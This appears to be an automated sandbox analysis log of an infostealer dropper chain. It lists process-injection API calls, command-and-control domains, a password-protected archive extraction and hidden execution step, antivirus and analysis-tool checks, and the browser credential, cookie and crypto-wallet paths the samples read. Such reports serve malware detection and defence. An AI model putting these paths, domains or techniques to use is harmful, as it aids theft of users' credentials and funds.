                              Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exeCode function: 8_2_0035519E GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessW,CreateProcessW,VirtualAlloc,VirtualAlloc,GetThreadContext,Wow64GetThreadContext,ReadProcessMemory,ReadProcessMemory,VirtualAllocEx,VirtualAllocEx,GetProcAddress,TerminateProcess,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,Wow64SetThreadContext,ResumeThread,ResumeThread,8_2_0035519E
                              Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exeMemory written: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exe base: 400000 value starts with: 4D5AJump to behavior
                              Source: cd2469328d.exe, 00000008.00000002.2549517738.00000000013B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: rapeflowwj.lat
                              Source: cd2469328d.exe, 00000008.00000002.2549517738.00000000013B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: crosshuaht.lat
                              Source: cd2469328d.exe, 00000008.00000002.2549517738.00000000013B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: sustainskelet.lat
                              Source: cd2469328d.exe, 00000008.00000002.2549517738.00000000013B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: aspecteirs.lat
                              Source: cd2469328d.exe, 00000008.00000002.2549517738.00000000013B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: energyaffai.lat
                              Source: cd2469328d.exe, 00000008.00000002.2549517738.00000000013B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: necklacebudi.lat
                              Source: cd2469328d.exe, 00000008.00000002.2549517738.00000000013B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: discokeyus.lat
                              Source: cd2469328d.exe, 00000008.00000002.2549517738.00000000013B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: grannyejh.lat
                              Source: cd2469328d.exe, 00000008.00000002.2549517738.00000000013B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: pancakedipyps.click
                              Source: 5cda6c90d7.exe, 0000000C.00000002.2861737147.0000000000F71000.00000040.00000001.01000000.0000000B.sdmpString found in binary or memory: cheapptaxysu.click
                              Source: 142c991362.exe, 00000023.00000003.3330595087.00000000055E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: sweepyribs.lat
                              Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exe "C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exe" Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exe "C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exe" Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1019802001\5cda6c90d7.exe "C:\Users\user\AppData\Local\Temp\1019802001\5cda6c90d7.exe" Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1019803001\7739517025.exe "C:\Users\user\AppData\Local\Temp\1019803001\7739517025.exe" Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exe "C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exe" Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1019805001\b6638733e4.exe "C:\Users\user\AppData\Local\Temp\1019805001\b6638733e4.exe" Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1019806001\b05c9e01f3.exe "C:\Users\user\AppData\Local\Temp\1019806001\b05c9e01f3.exe" Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1019807001\fed209a298.exe "C:\Users\user\AppData\Local\Temp\1019807001\fed209a298.exe" Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1019808001\c9d0f96e57.exe "C:\Users\user\AppData\Local\Temp\1019808001\c9d0f96e57.exe" Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe "C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe" Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1019810001\35f0a75b93.exe "C:\Users\user\AppData\Local\Temp\1019810001\35f0a75b93.exe" Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1019811001\2e4e1b8516.exe "C:\Users\user\AppData\Local\Temp\1019811001\2e4e1b8516.exe" Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknownJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknownJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exeProcess created: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exe "C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exe"Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exeProcess created: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exe "C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exe"Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019803001\7739517025.exeProcess created: C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exe "C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exe"
                              Source: C:\Users\user\AppData\Local\Temp\1019805001\b6638733e4.exeProcess created: unknown unknown
                              Source: C:\Users\user\AppData\Local\Temp\1019805001\b6638733e4.exeProcess created: unknown unknown
                              Source: C:\Users\user\AppData\Local\Temp\1019807001\fed209a298.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\main\main.bat" /S"
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mode.com mode 65,10
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e file.zip -p24291711423417250691697322505 -oextracted
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_7.zip -oextracted
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_6.zip -oextracted
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_5.zip -oextracted
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_4.zip -oextracted
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_3.zip -oextracted
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_2.zip -oextracted
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_1.zip -oextracted
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib +H "in.exe"
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\in.exe "in.exe"
                              Source: C:\Users\user\AppData\Local\Temp\1019810001\35f0a75b93.exeProcess created: unknown unknown
                              Source: 5cda6c90d7.exe, 0000000C.00000002.2863553827.000000000113E000.00000040.00000001.01000000.0000000B.sdmpBinary or memory string: BProgram Manager
                              Source: 2e4e1b8516.exe, 0000002D.00000000.3476591551.00000000006A2000.00000002.00000001.01000000.0000001E.sdmpBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                              Source: file.exe, file.exe, 00000000.00000002.1759285147.0000000000A8E000.00000040.00000001.01000000.00000003.sdmp, skotes.exe, skotes.exe, 00000001.00000002.1792074833.0000000000BDE000.00000040.00000001.01000000.00000007.sdmpBinary or memory string: Program Manager
                              Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exeCode function: EnumSystemLocalesW,8_2_00343086
                              Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exeCode function: GetLocaleInfoW,8_2_003430D1
                              Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,8_2_00343178
                              Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,8_2_00342A13
                              Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exeCode function: GetLocaleInfoW,8_2_0033F21C
                              Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exeCode function: GetLocaleInfoW,8_2_0034327E
                              Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exeCode function: EnumSystemLocalesW,8_2_00342C64
                              Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,8_2_00342CFF
                              Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exeCode function: EnumSystemLocalesW,8_2_0033F717
                              Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exeCode function: EnumSystemLocalesW,8_2_00342F52
                              Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exeCode function: GetLocaleInfoW,8_2_00342FB1
                              Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exeCode function: EnumSystemLocalesW,10_2_00343086
                              Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exeCode function: GetLocaleInfoW,10_2_003430D1
                              Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,10_2_00343178
                              Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,10_2_00342A13
                              Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exeCode function: GetLocaleInfoW,10_2_0033F21C
                              Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exeCode function: GetLocaleInfoW,10_2_0034327E
                              Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exeCode function: EnumSystemLocalesW,10_2_00342C64
                              Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,10_2_00342CFF
                              Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exeCode function: EnumSystemLocalesW,10_2_0033F717
                              Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exeCode function: EnumSystemLocalesW,10_2_00342F52
                              Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exeCode function: GetLocaleInfoW,10_2_00342FB1
                              Source: C:\Users\user\AppData\Local\Temp\1019805001\b6638733e4.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                              Source: C:\Users\user\AppData\Local\Temp\1019810001\35f0a75b93.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                              Source: C:\Users\user\AppData\Local\Temp\1019810001\35f0a75b93.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exe VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exe VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exe VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exe VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1019802001\5cda6c90d7.exe VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1019802001\5cda6c90d7.exe VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1019803001\7739517025.exe VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1019803001\7739517025.exe VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exe VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exe VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1019805001\b6638733e4.exe VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1019805001\b6638733e4.exe VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1019806001\b05c9e01f3.exe VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1019806001\b05c9e01f3.exe VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1019807001\fed209a298.exe VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1019807001\fed209a298.exe VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1019808001\c9d0f96e57.exe VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1019808001\c9d0f96e57.exe VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1019810001\35f0a75b93.exe VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1019810001\35f0a75b93.exe VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1019811001\2e4e1b8516.exe VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1019811001\2e4e1b8516.exe VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1019812001\54682ac64c.exe VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1019812001\54682ac64c.exe VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1019813001\cc6b47fc15.exe VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1019813001\cc6b47fc15.exe VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exeQueries volume information: C:\ VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exeQueries volume information: C:\ VolumeInformationJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019802001\5cda6c90d7.exeQueries volume information: C:\ VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exeQueries volume information: C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exe VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1019805001\b6638733e4.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1019805001\b6638733e4.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1019805001\b6638733e4.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1019805001\b6638733e4.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1019805001\b6638733e4.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1019805001\b6638733e4.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1019805001\b6638733e4.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1019805001\b6638733e4.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1019805001\b6638733e4.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1019805001\b6638733e4.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1019808001\c9d0f96e57.exeQueries volume information: C:\ VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeQueries volume information: C:\ VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1019810001\35f0a75b93.exeQueries volume information: C:\ VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1019810001\35f0a75b93.exeQueries volume information: C:\ VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeQueries volume information: C:\ VolumeInformation
                              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0086CBEA GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime,0_2_0086CBEA
                              Source: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                              Source: b6638733e4.exe, 00000013.00000003.2869803204.00000000075CF000.00000004.00001000.00020000.00000000.sdmp, b05c9e01f3.exe, 00000016.00000003.3009363267.0000000007330000.00000004.00001000.00020000.00000000.sdmp, b05c9e01f3.exe, 00000016.00000002.3059346963.0000000000E61000.00000040.00000001.01000000.00000012.sdmpBinary or memory string: procmon.exe
                              Source: b6638733e4.exe, 00000013.00000003.2869803204.00000000075CF000.00000004.00001000.00020000.00000000.sdmp, b05c9e01f3.exe, 00000016.00000003.3009363267.0000000007330000.00000004.00001000.00020000.00000000.sdmp, b05c9e01f3.exe, 00000016.00000002.3059346963.0000000000E61000.00000040.00000001.01000000.00000012.sdmpBinary or memory string: wireshark.exe
                              Source: 5cda6c90d7.exe, 0000000C.00000003.2800638240.000000000182D000.00000004.00000020.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2860663337.0000000005E38000.00000004.00000800.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2800310168.0000000005E38000.00000004.00000800.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2815144465.0000000005E38000.00000004.00000800.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2801132226.00000000017D2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                              Source: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
                              Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
                              Source: C:\Users\user\AppData\Local\Temp\1019802001\5cda6c90d7.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

                              Stealing of Sensitive Information

                              barindex
                              Source: Yara matchFile source: 14.2.Gxtuum.exe.aa0000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 13.2.7739517025.exe.530000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 14.0.Gxtuum.exe.aa0000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 15.0.Gxtuum.exe.aa0000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 13.0.7739517025.exe.530000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe, type: DROPPED
                              Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exe, type: DROPPED
                              Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\1019803001\7739517025.exe, type: DROPPED
                              Source: Yara matchFile source: 1.2.skotes.exe.9a0000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 0.2.file.exe.850000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 00000000.00000002.1758709605.0000000000851000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000001.00000002.1790996035.00000000009A1000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
                              Source: Yara matchFile source: Process Memory Space: 2e4e1b8516.exe PID: 4904, type: MEMORYSTR
                              Source: Yara matchFile source: Process Memory Space: cd2469328d.exe PID: 7820, type: MEMORYSTR
                              Source: Yara matchFile source: Process Memory Space: 5cda6c90d7.exe PID: 5040, type: MEMORYSTR
                              Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                              Source: Yara matchFile source: 0000002B.00000003.3493806478.0000000005110000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: Process Memory Space: 35f0a75b93.exe PID: 7748, type: MEMORYSTR
                              Source: cd2469328d.exe, 0000000B.00000003.2792191733.0000000000D38000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/Electrum
                              Source: cd2469328d.exe, 0000000B.00000003.2792191733.0000000000D38000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/ElectronCash
                              Source: cd2469328d.exeString found in binary or memory: %appdata%\com.liberty.jaxx\IndexedDB
                              Source: cd2469328d.exe, 0000000B.00000003.2792191733.0000000000D38000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: window-state.json
                              Source: 5cda6c90d7.exe, 0000000C.00000003.2838471636.0000000001816000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ":0,"p":"%appdata%\\Exodus\\exodus.wallet","m":["*"],"z":"Wallets/Exodus","d\}
                              Source: cd2469328d.exeString found in binary or memory: ExodusWeb3
                              Source: cd2469328d.exe, 0000000B.00000003.2792191733.0000000000D38000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/Ethereum
                              Source: cd2469328d.exeString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
                              Source: cd2469328d.exe, 0000000B.00000003.2691038020.0000000000D8D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: keystore
                              Source: global trafficTCP traffic: 192.168.2.4:49930 -> 185.121.15.192:80
                              Source: C:\Users\user\AppData\Local\Temp\1019810001\35f0a75b93.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
                              Source: C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Preferences
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
                              Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
